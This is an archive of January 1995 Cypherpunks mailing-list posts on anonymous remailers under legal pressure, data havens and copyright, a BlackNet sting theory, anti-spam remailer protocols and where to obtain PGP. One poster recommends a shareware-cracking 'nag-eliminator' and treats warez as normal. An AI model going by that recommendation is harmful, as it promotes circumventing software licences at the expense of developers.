Message-ID: <199501190914.BAA19681@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't think I've used "crisis" in a thread I started, so this tells
you what I think.

The remailers are stagnating, only very slowly adding important
features, and the number is not growing...in fact, it's been
shrinking.

This, as the remailers are under attack. Editorialists are railing
against the dangers of anonymity and remailers, and the "Church of
Scientology" is threatening lawsuits against remailer operators unless
they block certain newsgroups. (Lots of issues, clever workarounds
proposed, etc.)

Now whether or not the Church of Scientology, or RSADSI (for the RC4
code remailing), or anyone else could legally _win_ such a case is not
the issue. Not many remailer operators would be able to mount a
defense...they are not, frankly, folks heros as Zimmermann is--and
even PRZ is struggling to raise money. Maybe the EFF (ugh) would leap
into the fray, but I doubt it. Nope, I fear that the pressures that
have driven several remailers to halt operation are just the tip of
the iceberg. (Some remailers have quit because of words from their
sysadmins, semi-threatening conversations with Brad Templeton--Hi,
Brad!--, and so on. Real letters from real lawyers would have a
profoundly more chilling effect.)

We've debated this stuff many times, but the numbers of remailers are
shrinking. Raph Levien summarized the situation nicely in a post to
alt.anon-server: 

"We're down to fifteen remailers now, many of which are unreliable. I
would say the remailer net is not in good shape right now.
Fortunately, I know of a number of plans to bring new remailers up, as
well as restoring old ones."

(I hope Raph can share with us soon what some of the plans are, unless
he fears revealing this will aid our opponents.)

I could see the whole remailer system imploding. A few threatening
letters, especially if sent by real lawyers, could demolish the few
U.S. sites. And with the Netherlands toying with proposals to ban or
limit private encryption, having Holland as the main remaining host for
remailers would be rather precarious.

We need lots more remailers, in many more countries.

What can be done?

* We need to get the number of "solid" remailers up from the current
dozen or so up into the _hundreds_.

* I favor separating the "account that remails" from the "owner of the
site," as I have argued in vain in the past. (Example: a willing site
gives out or sells many accounts...each is legally separate, and each
must be legally challenged. My longer posts dealt with this.)

(The owner of the site/machine can take a "hands off" attitude toward
what his customers are doing in their accounts. This doesn't stop
pressures from being applied, but it slows them down, and (probably)
better insulates the owner from legal charges.)

* Traffic needs to be increased. Remailers should probably go to
constant padding traffic, to do this. Exhorting end-users to use
remailers more won't be enough.

* More offshore sites are needed. So far, only Canada and the
Netherlands are offshore hosts (and Canada is effectively part of the
U.S.). Some sites in Russia would be dramatic. Ditto for Asia, South
America, etc.

* The whole issue of "remailer businesses," with all the usual issues
of digital postage, stamps, coupons, etc, has to be resolved. That is,
we need to get some movement here. Most remailers are run as projects
by students on machines they don't control, or that they can be
pressured on, or with a committment to stay in business that will
evaporate too easily. A business, with business responsibilities, is
usually a more stable solution. 

I think we need to set some rough targets and brainstorm on how to get
to them.

For example, the Linux mavens could tell us if Linux-based remailer
boxes could be hung on dedicated connections to The Little Garden
network, as a specific example. A "black box remailer" such as several
folks have suggested (Chaum (in 1981), me, Eric Hughes, others) might be
buildable for under a grand. We could ask here for contributions, and
might even raise this amount of money. Then each of us who contributed
could have "accounts," maybe several of them. Imagine 100 or more
"remailers" all on this one machine--I'm deliberately ignoring the
security issue for now. Little Garden has stated categorically that
they will not tell users what they can or can't do with their machines
(though I can think of some cases where they might have to, as with
spamming, etc.). Anyway, you can see where I'm headed.

My big fear is that the one really major achievement of the
Cypherpunks group, the remailers, are not increasing in number and
could be knocked out all too easily with some legal attacks.

It's time to get cracking on this crisis.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 18 Jan 95 17:45:03 PST
To: cypherpunks@toad.com
Subject: copyright and data havens
In-Reply-To: <gate.ms64yc1w165w@dxm.ernet.in>
Message-ID: <Pine.HPP.3.91.950119000101.4197A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in wrote:

> factories). It's not going to be easy to find a country more willing and
> able to ignore international copyright law (Berne Convention etc) than China;
> however, despite howls of protest even China is likely to knuckle down 
> eventually. What may be likely is distributed piracy markets, such as 

In the foreseeable future (10 years?) there will exist jurisdictions that,
even after signing this or that convention, will be more or less lax
about pursuing violators. Thus I still believe, despite China's awaited
submission, that the Internet and 28.8 modems (and abundance of disk space)
are real threats to holders of copyright who want to protect every penny.

Encryption (by the way, how long might it take to IDEA-encrypt a 2 MB
.zip file? I never tried) will make it practically impossible to find
and prosecute at least private copyright abuse. They won't use thumb-
screws to obtain the key to your SecureDrive just on suspicion of
infringement (except possibly in Singapore). The present situation,
as we all know, is that few people are willing to pay for such software
as games if they can get a (cracked) version for free. I think this
attitude will expand to most software. The real war will be faught
between protectors and crackers (since it is usually not convenient
to export an opened, installed version to another system - and more
so the bigger and directory-spreading the program is). Actually, a
sort of data haven for cracks already exists. If you live in a
jurisdiction where cracks are illegal to advertize (let alone use)
they can be hard to find on your local BBS, but with an Internet feed
(or long distance modem calls) it's no problem at all. (For those
who don't believe in the shareware concept I recommend the Norwegian
nag-eliminator 'Buster' - although you need the registered version
for the latest versions :-)

Mr La Macchia got caught. How many didn't? Look at the IRC Undernet:
wArEz-bots all over the place - and I bet the net.cops are lagging
in bot comprehension (unfortunately, so am I...). And there is talk
about this Secure-IRC.

Mats
    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 18 Jan 95 23:52:52 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <m0rUn1t-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain



...
> Album."
> 
> Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
> (?). When I met him a couple of years ago, he'd just gotten out of
> jail and was working for the satellite Usenet distribution company
> (whose name I don't recall, and who I've heard less of than I might've
> expected to, subjunctively speaking).

Bzzzt....  You're error correction is working overtime...

That's Len Rose, formerly with Pagesat, currently with barrnet.
His offense, BTW, was basically giving the source to ATT login.c
to a college kid...  Documented somewhat poorly in 'The Hacker Crackdown',
Bruce Sterling.

> In any case, there a zillion odd opinions on the Net of a Million
> Lies. Most of them will vanish without a trace. That's comforting.
> 
> --Tim May

Now, my name is one that really should cause collisions...

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Thu, 19 Jan 95 01:25:07 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: remailer security
In-Reply-To: <Pine.HPP.3.91.950117202620.25204C-100000@cor.sos.sll.se>
Message-ID: <Pine.3.89.9501190333.B17770-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Sorry I'm a tad late. This time I got axed for just two groups.
C2.orgs WWW page doesn't, but only sameer knows for sure.
And you might have fun looking at the "I thought you should see it
first", in news.admin.policy  Feel free to post it anywhere you 
like as anonymously as you like. There are lots CP ref's in it, and 
and if I don't do the reposting, I can't get in trouble.

Now I've got to catch up reading & fixing WWW pages, and I'll link every
WWW ref I see on this list in a dy or two. Thanks, Carol Anne
 
Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com      http://www.c2.org/~carolann       carolann@c2.org
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM

On Tue, 17 Jan 1995, Mats Bergstrom wrote:
> multiple chaining for the lazy, though: C2 lets you pick the chained
> sites by clicking on a web-page (but does it encrypt??).
> 
> Mats 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Thu, 19 Jan 95 01:48:32 PST
To: yusuf921@uidaho.edu (Syed Yusuf)
Subject: Re: FBI and BLACKNET
In-Reply-To: <Pine.HPP.3.91.950118195153.6655E-100000@goshawk.csrv.uidaho.edu>
Message-ID: <m0rUtU0-0002GhC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> On Tue, 17 Jan 1995, Craig Hubley (I) wrote:
> 
> > Regarding BlackNet, I am not sure that they are not *run* by the FBI,
> > or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental 
> > entity. 
> 
> The more I think about it the more this theory makes sense. I know 
> how they _could_ have traced me but this doesn't explain all their other
> "leads" they are following up on and he seemed to imply there were many.
> 
> >>> Not to mention entrapment is their MO. <<<
> 
> What do you say we put the word out?

Mixed feelings.  On the one hand, I am starting to believe in this theory
more and more.  On the other hand, I think that having a BlackNet run by
security agencies is actually a stabilizing thing to some degree:  those
who are foolish enough to deal with unknown parties with unknown interests
in arbitrary secrets with petty motives will generally become neutralized.
For instance, those who sell 2000 credit card numbers or 500 broken Digital
Cash Card readouts (is this possible) can be paid or prosecuted at leisure.

In either case, such folks will find more and more security holes plugged
as they clearly identify where they are for the security agencies... this
would prevent a general crackdown on cryptography etc., effectively the
security agencies would have learned to work 'within the new realities'.

I suspect targets might be less likely to be chosen by police discretion,
and more likely to be chosen for their threat value, if they required less
(discretionary) effort to investigate in the first place.  Note that some
laws, like small scale marijuana growing, often go unenforced unless there
is a specific complaint or hard evidence is directly presented to police.
In the 'BlackNet sting', such a flow of evidence would be constantly on its
way in to the police, probably forcing them into more of a reactive mode,
and definitely focusing their attention on those actively peddling secrets
as opposed to those just trying to keep them.  Not too bad for privacy.

Furthermore, the flow of truly scary secrets flowing their way might make
them ration their effort to plug leaks of high priority:  nuclear weapon
design, biological warfare blueprints, formulae for putting necrotizing
fascitis into the common cold protein coat, 'gray goo' nanotechnology...
and other things that constitute serious threats to life on this planet.
This might probably divert effort away from prosecuting 'victimless crime',
enhancing civil liberties. For once such agencies might be 'doing their job'.
If indeed they have any legitimate job, which is always up for debate.

Of course they will also engage in petty prosecution of those who they
perceive are acting against their narrow interests, but all organisms
act to preserve and advance themselves... this comes and goes with their
leaders (J. Edgar Hoover, William Casey come to mind as good/bad examples)
who hopefully turn over with the tide of politics, minimizing the abuses
in the long run.  Of course this is little consolation to those they target.
Systematic abuses might be more easily revealed by 'whistleblowers' if there
were a clear record kept 'inside' of which leads were followed and which not.

Blow the whistle?  Sure, we could.  But what difference does it make?  If
no one trusts BlackNets, then the security agencies just take a different
route to building up credibility for a 'sting', using more private means,
or many such more private means, and again we increase their discretionary
powers as they decide where to devote effort to building up a reputation
(hmm do we target Columbian druglords?  biohackers?  breakaway republics?
cryptographers?) and thereby where to concentrate enforcement.  Perhaps by
blowing a whistle on a 'BlackNet sting' we simply force them to evolve to
more devious methods, that require more planning, and costs more (thus maybe
reducing their overall activity - although history says otherwise) but in
the long run is even more directed by the interest/prejudice of leaders.  It
may be that the simpler and more reactive the methods they apply, the better.
It is largely premeditated human scheming that starts wars, isn't it?  Not
simple knee jerks.  Perhaps others believe otherwise, but not really an issue
for debate in cypherpunks.

Perhaps it is better to co-opt agencies by giving them a reason to adopt
the cryptographer's agenda.  It's got to be cheaper and easier for them
to sit and buy secrets than it is to go out and dig them up themselves...
and cryptography generally advances that capability as folks feel safe
using it to transmit secrets electronically.  

Of course the idea that black nets must be a sting is speculation, but
it would hardly be the first time that security agencies and those that
they officially target had developed a symbiotic relationship.  Here in
Canada it was recently revealed that CSIS (the 'Canadian CIA') had been
actively involved in the founding of the Heritage Front, a neo-Nazi group.
In fact one of their leaders was an agent!  Interestingly, this appears 
to be a more effective/cheaper way to control a large group of otherwise
dangerous people - if they want to follow a leader, let them!  Just make
sure the leader is someone you control and you can prevent things from
getting too far out of hand.  Which is the only time that CSIS or the CIA
should be stepping in anyway.  It is sort of a pre-emptive strike and not
at all 'politically correct' in a liberal democracy, but they do it anyway.

That's life.  And maybe it's easier to keep an eye on simple forms of life.

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 19 Jan 95 02:30:36 PST
To: cypherpunks@toad.com
Subject: Re: Anti-Spam Methods
Message-ID: <199501191035.FAA07879@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Nathan Zook writes:
> Ivan Boskey?  (sp)

"Boesky"

[...]
>      We are capable of controlling mail bombs, for instance, in the
> following way:
>  
>      Take an incoming message, capture From: line.  Strip header.  MD5 body.
> Add to sorted table [From: MD5(message) date].  Check for repetition of
> first two fields.  If reps = 1, forward message.  If reps = 2, send message
> to From:  "Possible error.  Two copies of message <message> received."  

We were just discussing this on the remailer operators' list. Homer was
mulling over sending an automatic acknowledgement of each article submitted
for anon posting. I pointed out that From: lines (and even From lines) are 
notoriously unreliable. For example, in the Scythe spam, the articles were
ostensibly from various people @crl.com. Autoacks might have raised the ire
of plenty of people, but wouldn't have reached the real perpetrator.

> If reps = 0 mod 5, send letter to postmaster@From:.  "Possible mailbomb or
> spam.  <reps> copies of <message> received from <From:> at your site in the
> past week." Clear table of entries more than a week old every midnight.

This would necessitate keeping full logs of all traffic passing through the
remailer for up to a week. Speaking only for myself, I can't imagine adopting
such a remailer policy. YMMV.

>      If all remailers did this, then no matter where the net was entered,
> the messages would be rejected.  And spammers/bombers would be spamming/
> bombing their own postmaster.  

Again, in a forged-spam case like Scythe, the spammers/bombers would be
inducing the remailers to spam/bomb some arbitrary postmasters -- perhaps even
the remailers' postmasters -- as a side effect.

A "call-back" scheme might, however, be used to verify an originator's 
address. In this scheme, when a remailer receives a message for remailing, it
generates a few lines of random garbage and associates them with the message.
These lines are sent, along with a hash of the original message, in a brief 
ack message to the address in the From: line of the message. The headers of 
the message are discarded. When the remailer receives a message with a 
Callback: header, it checks the reply against the table associated with the 
current message pool. If a match is found, the associated message is marked 
ready for remailing. After a fairly short period, a message which still hasn't
been marked for remailing is deleted.

With chaining, more record-keeping by the remailers would be needed. The
remailers can't automatically honor all callbacks from other remailers, 
because wise forgers would simply forge their mail so it appeared to originate
from some known remailer address. So each remailer would need to keep (for a
brief period) a hash of each message it remails, in order to decide which
callback queries to answer. A list of current remailers could be used to
winnow out messages which are not being remailed to other remailers, and hence
need not be hashed and kept.

This protocol would aid a remailer operator who decided to trace a spam in
progress, because it should prevent spammers from forging their messages.

Couple this with mandatory appending of encrypted reply blocks, and the
release valve of two-way communication might be opened. Legal proceedings
obviously can't be brought successfully against anonymous parties, so 
achieving common carrier status is about the only antidote to that problem
I can foresee at the moment.

I'm thinking about working on code to implement some of this stuff in existing
remailer software, so I'm especially interested in hearing objections, flames,
suggestions, encouragement, etc. about it. I've spent a while contemplating
the wants and needs of prospective benign remailer users -- market research,
if you will. At this point, I think patching together various pieces of
existing remailer technology might greatly improve the attractiveness of the
c'punks style remailers.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx4/Tmf7YYibNzjpAQGcHgP+Nmo+c/Cfdul7HsZGOXR+cP+rmAVP1tRB
6PZcm/PDycd9HBTYqhraPsmwn7OGbqnWTeF0O5AitGSnwdG5o8+sSdUJ+KfJ1AcQ
tcyBFlvk9Rh/UIuzksUOeY935CVMA0nEmiXLoyJnnpiRoThctd/yILd8V+qiQ1pK
46j6Y7WeK5E=
=vUEc
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx5AZCoZzwIn1bdtAQE70wF/dta1dAuc7yWpkqkK2asa+9V/H3zN/cPI
vGyOSZMIvRCcAGLgSCUwZes+e3l7ETnZ
=2HOy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 19 Jan 95 03:25:14 PST
To: cypherpunks@toad.com
Subject: Law of Electronic Commerce -- seminar announcement
Message-ID: <v01510105ab4341969eb0@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


FWIW,
Bob Hettinga

>From: nsb@radiomail.net
>Date: Wed, 18 Jan 1995 14:16:54 -0800
>To: inet-marketing@einet.net, www-buyinfo@allegra.att.com,
>        edi-new@tegsun.harvard.edu, ietf-edi@byu.edu
>Original-From: "NSB's Portable (via RadioMail)" <nsb@radiomail.net>
>Subject: Law of Electronic Commerce -- seminar announcement
>Reply-To: Nathaniel Borenstein <nsb@nsb.fv.com> (via RadioMail)
>
>To help educate business professionals about electronic commerce,
>First Virtual (TM) Holdings Incorporated is pleased to lend promotional
>support to:
>
>                   Law of Electronic Commerce
>                         On-line Seminar
>         Starting January 30, March 13, and May 9, 1995
>                  Future Dates to Be Announced
>
>The National Computer Security Association announces a new form of
>professional education -- an on-line seminar.  It is education
>delivered through the NCSA InfoSecurity Forum on CompuServe.
>(Internet delivery is also available.)  For 30 days, attorney
>Benjamin Wright will convene a seminar covering The Law of
>Electronic Commerce -- EDI and E-mail Contracts and Records.
>
>Participants will attend the seminar by exchanging computer
>messages with Wright in a private discussion forum.  Thus, no one
>will have to travel or miss time away from the office or home.
>
>The seminar is designed for security managers, Online and MIS
>professionals, EDI managers, purchasing managers who use EDI and E-
>mail, lawyers, accountants and auditors.  Topics on the agenda:
>
>1.  Electronic Contracts
>2.  Electronic Data Interchange (EDI) and Electronic Funds Transfer
>3.  Electronic Signatures
>4.  EDI Trading Partner Agreements
>5.  Value-Added Network Agreements
>6.  Electronic & Optical Evidence
>7.  EDI & Optical Tax Records
>8.  UCC Article 4A
>9.  Electronic Healthcare Data
>10. E-mail Privacy
>
>Tuition is $350 for NCSA members and $395 for non-members.  (Group
>discounts are available.)
>
>The starting dates for the next three sessions of the seminar are
>January 30, March 13, and May 9, 1995.
>
>Special Guest Lecturers:
>
>     Nathaniel Borenstein, Chief Scientist,
>          First Virtual Holdings Incorporated
>
>     Richard K. Crone of KPMG Peat Marwick LLP,
>          electronic banking expert
>
>Views expressed in the seminar are those of the individuals expressing
>them and not necessarily those of sponsors, employers or anyone else.
>
>To register on-line, or for more information and a free brochure, point
>your browser at the following URL:
>
>http://www.infohaus.com/sponsored/ncsa-seminar.html
>
>Or write to:
>
>National Computer Security Association
>10 South Courthouse Ave.
>Carlisle, PA  17013
>Tel: (800) 488-4595
>Tel: (717) 258-1816
>Fax: (717) 243-8642
>bwrigh01@reach.com
>
>             (This Notice May Be Distributed Freely)

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Thu, 19 Jan 95 03:41:25 PST
To: Richard Parratt <rparratt@london.micrognosis.com>
Subject: Re: Internet, spamming, etc.
In-Reply-To: <9501191012.AA04837@pero>
Message-ID: <Pine.SV4.3.91.950119062732.2080B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> One could theoretically have a package that sprayed UDP packets
> at a particular IP address, or even have a modified TCP
> that ignored disconnects. I think most service providers
> would regard using such code as being on a par with running
> a program that tried to telnet sequentially to all known IP
> addresses, trying common passwords on each.

  Code exists to do all of the things that you've mentioned.

  That was the original point of the discussion.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Thu, 19 Jan 95 07:18:01 PST
To: dubois@csn.org
Subject: Where to Get PGP FAQ
Message-ID: <Pine.3.89.9501190724.A20182-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

===============================BEGIN SIGNED TEXT=============================

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP)
(Last modified: 17 January 1995 by Mike Johnson)

WHAT IS THE LATEST VERSION?

 |-----------------+---------------------+---------------------------------|
 | Platform(s)     | Latest Version      | Distribution File Names         |
 |-----------------+---------------------+---------------------------------|
 | DOS, Unix,      | Viacrypt PGP 2.7    | disk sets                       |
 | Mac, Windows,   |                     |                                 |
 | or WinCIM/CSNav |                     |                                 |
 |-----------------+---------------------+---------------------------------|
 | DOS, Unix,      | MIT PGP 2.6.2       | pgp262.zip  (DOS + docs)        |
 | others          |                     | pgp262s.zip (source)            |
 |                 |                     | pg262s.zip source on CompuServe |
 |                 |                     | pgp262.tar.gz (source)          |
 |                 |                     | pgp262.gz (same as above on DOS)|
 |                 |                     | pgp262.tar.Z (source)           |
 |                 |                     | pgp262dc.zip (documentation)    |
 |                 |                     | pg262d.zip (docs on CompuServe) |
 |-----------------+---------------------+---------------------------------|
 | Macintosh       | MIT PGP 2.6         | MacPGP2.6.sea.hqx (binary+docs) |
 |                 |                     | macpgp26.hqx (same as above)    |
 |                 |                     | MacPGP2.6.src.sea.hqx (source)  |
 |                 |                     | macpgp26.src (same as above)    |
 |                 |                     | MacPGP2.6-68000.sea.hqx (binary)|
 |                 |                     | mcpgp268.hqx (same as above)    |
 |-----------------+---------------------+---------------------------------|
 | Mac Applescript | MacPGP 2.6ui v 1.2  | MacPGP-2.6ui-v1.2.sit.hqx       |
 |                 | + some beta versions| MacPGP2.6ui_V1.2_sources.cpt.hqx|
 |                 | based on MIT PGP    | MacPGP2.6uiV1.2en.cpt.hqx       |
 |                 | 2.6.2               | MacPGP2.6uiV1.2src.cpt.hqx      |
 |                 |                     | MacPGP2.6uiV1.2.68000.hqx       |
 |                 |                     | MacPGP2.6.2.beta*.sea.hqx       |
 |                 |                     | MacPGP2.6.2.beta*.src.sea.hqx   |
 |-----------------+---------------------+---------------------------------|
 | Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
 |                 |                     | pgp262-a14-020.lha              |
 |                 |                     | pgp262-a14-src.lha              |
 |-----------------+---------------------+---------------------------------|
 | Atari           | Atari PGP 2.6.1     | pgp261st.zip                    |
 |                 |                     | pgp261b.lzh                     |
 |-----------------+---------------------+---------------------------------|
 | Non-USA version | PGP 2.6.i from      | pgp26i.zip                      |
 | to avoid RSAREF | Stale Schumacher    | pgp26is.zip                     |
 | license.        |                     | pgp26is.tar.gz                  |
 |_________________|_____________________|_________________________________|


PGP BOOKS

Protect Your Privacy:         PGP: Pretty Good Privacy
  A Guide for PGP Users
by William Stallings          by Simson Garfinkel
Prentice Hall PTR             O'Reilly & Associates, Inc.
ISBN 0-13-185596-4            ISBN 1-56592-098-8
US $19.95                     US $24.95

If you order Stallings' book from National Computer Security Association
(74774.1326@compuserve.com) they will donate $1 of the price to Phil
Zimmermann's legal defense fund.


WHERE CAN I GET THE PGP VERSION DIRECTLY FROM PHILIP ZIMMERMANN?

Get the MIT version.  See  http://web.mit.edu/network/pgp-form.html


WHAT IS PGP 2.6.i?

Stale Schumacher <staalesc@ifi.uio.no> released an international version of
PGP built the "right way."  By "right way," I mean that it uses the latest
MIT code, but uses a different rsaglue.c to use the mpilib instead of RSAREF
for RSA calculations, thus including all the latest bug fixes and features in
the main freeware PGP code line, but frees non-USA persons from the
limitations of the RSAREF license.  This release has been as strongly
endorsed by Philip Zimmermann as he can do without incriminating himself.

Naturally, by not using the RSAREF code for RSA calculations, this version is
not legal for use in the USA (other than limited research, etc.), but is fine
anywhere else (like Canada) were RSA patents don't hold.

Note that the latest version of Stale Schumacher's PGP is 2.6.i, 2.6i
(without the second .) was a beta test version that has been superceded.


WHAT IS PGP 2.6ui?

The "unofficial international" versions are really just PGP 2.3a, modified
just enough to make it compatible with MIT PGP 2.6, but do not include all of
the fixes in MIT PGP 2.6 and MIT PGP 2.6.1.  They have a "ui" somewhere in
their file names.


WHERE CAN I GET VIACRYPT PGP?

Contact Viacrypt in Phoenix, Arizona, USA.  The commecial version of PGP is
fully licensed to use the patented RSA and IDEA encryption algorithms in
commercial and government environments in the USA and Canada.  It is fully
compatible with, functionally the same as, and just as strong as the freeware
version of PGP. Due to limitations on ViaCrypt's RSA distribution license,
ViaCrypt only distributes executable code and documentation for it, but they
are working on making PGP available for a variety of platforms.  Call or
write to them for the latest information.  The latest version number for
Viacrypt PGP is 2.7.

Here is a brief summary of Viacrypt's currently-available products:

1. ViaCrypt PGP for MS-DOS.  Prices start at $99.98

2. ViaCrypt PGP for UNIX.  Includes executables for the following
   platforms:

     SunOS 4.1.x (SPARC)
     IBM RS/6000 AIX
     HP 9000 Series 700/800 UX
     SCO 386/486 UNIX
     SGI IRIX
     AViiON DG-UX(88/OPEN)

   Prices start at $149.98

     Executables for the following additional platforms are
     available upon request for an additional $30.00 charge.

     BSD 386
     Ultrix MIPS DECstation 4.x


3. ViaCrypt PGP for WinCIM/CSNav.  A special package for users of
   CompuServe.  Prices start at $119.98

Please contact ViaCrypt for quantity discount pricing.

Orders may be placed by calling 800-536-2664 during the hours of 8:30am to
5:00pm MST, Monday - Friday.  They accept VISA, MasterCard, AMEX and Discover
credit cards.

If you have further questions, please feel free to contact:

Paul E. Uhlhorn
Director of Marketing, ViaCrypt Products
Mail:          9033 N. 24th Avenue
               Suite 7
               Phoenix AZ 85021-2847
Phone:         (602) 944-0773
Fax:           (602) 943-2601
Internet:      viacrypt@acm.org
Compuserve:    70304.41


WHERE CAN I GET THE FREEWARE PGP?

These listings are subject to change without notice.  If you find that PGP has
been removed from any of these sites, please let me know so that I can update
this list.  Likewise, if you find PGP on a good site elsewhere (especially on
any BBS that allows first time callers to access PGP for free), please let me
know so that I can update this list.  Because this list changes frequently, I
have not attempted to keep it complete, but there should be enough pointers
to let you easily find PGP.

There are several ways to get the freeware PGP:  ftp, WWW, BBS, CompuServe,
email ftp server, and sneakernet (ask a friend for a copy).  Just don't ask
Philip Zimmermann directly for a copy.


FTP SITES IN NORTH AMERICA

There are some wierd hoops to jump through, thanks to the U. S. Department of
State, at many of these sites.  This is apparently because the U. S.
Department of State wants to make it easier for people outside of North
America to develop, distribute, use, or sell strong cryptographic software
than people inside of the USA and Canada -- at least that is the effect of
their rules.

Telnet to net-dist.mit.edu, log in as getpgp, answer the questions, then ftp
to net-dist.mit.edu and change to the hidden directory named in the telnet
session to get your own copy.

MIT-PGP is for U. S. and Canadian use only, but MIT is only distributing it
within the USA (due to some archaic export control laws).

You can also get PGP from:

ftp.csn.net/mpj
    See ftp://ftp.csn.net/mpj/README.MPJ

ftp.netcom.com/pub/mp/mpj
    See ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ

ftp.netcom.com/pub/gr/grady/PGP (U. S. and Canada only).

ftp.eff.org
    Follow the instructions found in README.Dist that you get from one of:
    ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist
    gopher.eff.org, 1/Net_info/Tools/Crypto
    gopher://gopher.eff.org/11/Net_info/Tools/Crypto
    http://www.eff.org/pub/Net_info/Tools/Crypto/

ftp.csua.berkeley.edu (for U. S. or Canadian users)
    /pub/cypherpunks/pgp/

ftp.gibbon.com
    /pub/pgp/README.PGP (OS/2 users see also /pub/gcp/gcppgp10.zip)

ftp.wimsey.bc.ca
    /pub/crypto/software/dist/README


WORLD WIDE WEB ACCESS

    http://web.mit.edu/network/pgp-form.html
    http://www.ifi.uio.no/~staalesc/PGPVersions.html
    http://www.mantis.co.uk/pgp/pgp.html
    http://rschp2.anu.edu.au:8080/crypt.html
    http://www.eff.org/pub/Net_info/Tools/Crypto/
    http://community.net/community/all/home/solano/sbaldwin
    http://www.cco.caltech.edu/~rknop/amiga_pgp26.html

COMPUSERVE

GO NCSAFORUM.  Follow the instructions there to gain access to Library 12: Export
Controlled.  PGP may be other places, too.

Compuserve file names are even more limited than DOS (6.3 instead of the
already lame 8.3), so the file names to look for are PGP262.ZIP, PG262S.ZIP
(source code), PGP262.GZ (Unix source code) and PG262D.ZIP (documentation
only).


BULLETIN BOARD SYSTEMS

Colorado Catacombs BBS
    Mike Johnson, sysop
    Mac and DOS versions of PGP, PGP shells, and some other crypto stuff.
    Also the home of some good Bible search files and some shareware written
    by Mike Johnson, including ATBASH, DLOCK, CRYPTA, CRYPTE, CRYPTMPJ, MCP,
    MDIR, DELETE, PROVERB, SPLIT, ONEPAD, QUICRYPT, etc.
    v.FAST/v.32bis/v.42bis, speeds up to 28,800 bps
    8 data bits, 1 stop, no parity, as fast as your modem will go.
